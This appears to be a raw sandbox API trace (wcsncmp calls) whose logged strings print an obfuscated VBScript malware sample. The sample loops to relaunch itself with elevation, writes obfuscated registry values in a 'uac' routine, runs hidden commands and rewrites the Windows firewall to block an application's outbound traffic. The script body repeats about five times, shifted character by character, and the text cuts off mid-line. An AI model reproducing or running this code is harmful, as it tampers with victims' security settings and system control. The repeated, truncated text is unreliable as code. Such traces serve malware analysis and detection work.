bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.981] wcsncmp (_String1="onst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.981] wcsncmp (_String1="nst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.982] wcsncmp (_String1="st PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.982] wcsncmp (_String1="t PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.982] wcsncmp (_String1=" PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 